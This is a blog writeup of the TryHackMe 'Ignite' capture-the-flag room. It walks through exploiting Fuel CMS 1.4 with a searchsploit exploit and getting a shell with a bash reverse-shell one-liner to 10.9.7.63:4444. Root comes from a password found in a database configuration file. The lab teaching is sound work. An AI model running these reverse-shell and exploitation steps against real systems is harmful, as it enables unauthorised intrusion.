Ignite – TryHackMe Writeup

Posted byWaqas AhmedPosted inEthical Hacking & Penetration Testing, Ignite THM, TryHackMeTags:,

Introduction:

The purpose of this writeup is to document the steps I took to complete TryHackMe.com (THM)’s room Ignite hacking tasks.

Resources/Tools Used:

[Task 1] Root it!

Root the box!

#1 User.txt

  • Deployed the machine and browsed to the website.
Webpage
  • Noticed the website was running Fuel CMS version 1.4. While reading the information on this page noticed the credentials listed.
CMS credentials
  • Used these credentials to login to CMS and noticed we can upload files on this server.
CMS login
  • With version of CMS known used searchsploit to identify if any exploit is available for Fuel CMS.
Fuel CMS searchsploit
  • Copied the exploit code to local directory to view code.
Exploit copy
  • Updated the IP address to reflect IP address of the target machine.
IP address update
  • As we will not be using proxy (burp or any other proxy software) comment out the proxy code in the exploit.
Comment out proxy variable
  • Executed the code and got a shell.
Exploit successful
  • Searched for bash
bash
  • Visited the pentest monkey website to get bash reverse shell.
pentestmonkey.net bash reverse shell
  • Copied the above code to a file “rev.sh” and updated to reflect my local IP and port so we may get the reverse shell.

bash -i >& /dev/tcp/10.9.7.63/4444 0>&1

  • Started netcat listener on port 4444.
netcat listener
  • Started a webserver to host “rev.sh” and access it from target machine.
Hosting server
  • Downloaded the file on target machine
Downloaded rev.sh to target machine
  • Changed permissions of the file “rev.sh” so we may execute it on target machine.
Changed permission of rev.sh
  • Ran “rev.sh” file to get shell from target machine.
Executed rev.sh
  • Got shell on local machine.
Shell access
  • Browsed to “/home/www-data” directory and got “User.txt” file.
Flag 1

#2 Root.txt

  • Entered “sudo -l” command but it did not work as we did not have a terminal shell.
Non-terminal shell
  • To get a terminal shell, entered the following command to get a terminal shell:

python -c “import pty;pty.spawn(‘/bin/bash’)”

  • Background the session using CTRL^Z
  • Then entered the following command:

stty raw -echo

  • Brought the bacgrounded session to foreground by following command

fg 1

Terminal shell
  • Then entered “sudo -l” but password prompt was shown. As we don’t have the password so we did not pursue this further.
sudo -l
  • During initial reconnaissance we noticed some instructions related to Database configuration on the webpage.
DB config file
  • Browsed to the configuration file to see if we can find some userame:password.
DB configuration
  • Upon reviewing the configuration file found the root password in this configuration file.
Root password
  • After getting the root password used su root command and entered the newly discovered password to get root access.
Root access
  • Browsed to “/root” directory to get root flag by reading contents of file “root.txt”.
Flag 2

I hope this helped. Thanks.

Leave a comment

Design a site like this with WordPress.com
Get started